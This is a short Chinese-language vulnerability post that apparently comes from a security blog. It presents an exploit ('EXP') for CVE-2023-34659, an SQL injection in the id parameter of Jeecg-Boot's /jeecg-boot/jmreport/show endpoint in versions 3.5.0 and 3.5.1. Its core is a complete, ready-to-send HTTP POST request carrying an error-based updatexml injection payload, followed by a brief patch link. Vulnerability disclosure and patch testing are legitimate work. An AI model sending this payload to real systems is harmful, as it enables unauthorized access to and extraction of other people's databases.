
CVE-2023-34659漏洞(附EXP)
0x00写在前面
本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需自行负责!
0x01漏洞介绍
Jeecg-Boot是JeecgBoot社区的一款基于代码生成器的低代码平台。
jeecg-boot 3.5.0和3.5.1 版本存在安全漏洞,该漏洞源于 /jeecg-boot/jmreport/show 接口的 id 参数存在SQL注入漏洞。
0x02影响版本
jeecg-boot 3.5.1
jeecg-boot 3.5.0
0x03漏洞复现
1.访问漏洞环境
2.对漏洞进行复现
Poc
POST /jeecg-boot/jmreport/show HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
Connection: close
Content-Length: 147
Content-Type: application/json;charset=UTF-8
Accept-Encoding: gzip
{
"id": "961455b47c0b86dc961e90b5893bff05",
"apiUrl": "",
"params": {
"id ": "1 ' or ' % 1 % ' like (updatexml(0x3a,concat(1,(version())),1)) or ' % % ' like '"
}
}
复现请求
3.nuclei工具测试(漏洞不存在)
0x04修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
https://github.com/jeecgboot/jeecg-boot/issues/4976
评论
隐私政策
你无需删除空行,直接评论以获取最佳展示效果